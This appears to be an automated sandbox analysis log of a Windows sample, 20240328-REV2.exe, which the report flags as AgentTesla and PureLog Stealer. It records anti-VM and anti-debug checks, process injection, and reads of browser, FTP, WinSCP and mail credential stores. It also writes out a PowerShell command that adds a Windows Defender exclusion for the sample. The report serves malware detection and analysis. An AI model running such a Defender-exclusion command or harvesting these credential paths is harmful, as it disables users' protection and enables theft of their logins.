                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: CE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: 89D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: 99D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: 9BE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: ABE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: B150000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: C150000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: E90000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: 2940000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7156Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2275Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeWindow / User API: threadDelayed 2036Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeWindow / User API: threadDelayed 2726Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3672Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6816Thread sleep count: 2036 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -99890s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -99770s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -99640s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -99515s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6816Thread sleep count: 2726 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -99358s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -99249s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -99140s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -99029s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -98904s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -98781s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -98672s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -98562s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -98453s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -98343s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -98234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -98125s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -97977s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -97859s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -97750s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -97640s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exe TID: 6072Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\20240328-REV2.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\20240328-REV2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 99890Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 99770Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 99640Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 99515Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 99358Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 99249Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 99140Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 99029Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 98904Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 98781Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 98672Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 98562Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 98453Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 98343Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 98234Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 98125Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 97977Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 97859Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 97750Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 97640Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: Amcache.hve.8.drBinary or memory string: VMware
                        Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                        Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                        Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: 20240328-REV2.exe, 00000005.00000002.2743758681.000000000099A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllstringPNPDeviceID
                        Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: 20240328-REV2.exe, 00000005.00000002.2751147441.0000000005D20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWJ
                        Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe"
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe"Jump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\20240328-REV2.exeMemory written: C:\Users\user\Desktop\20240328-REV2.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\20240328-REV2.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeProcess created: C:\Users\user\Desktop\20240328-REV2.exe "C:\Users\user\Desktop\20240328-REV2.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Users\user\Desktop\20240328-REV2.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Users\user\Desktop\20240328-REV2.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                        Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.436e7a0.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.4345780.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.20240328-REV2.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.436e7a0.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.2743308776.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1582368712.0000000004187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 20240328-REV2.exe PID: 4788, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.6d50000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.6d50000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.3799970.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.1585065911.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1582368712.0000000003799000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Users\user\Desktop\20240328-REV2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\20240328-REV2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
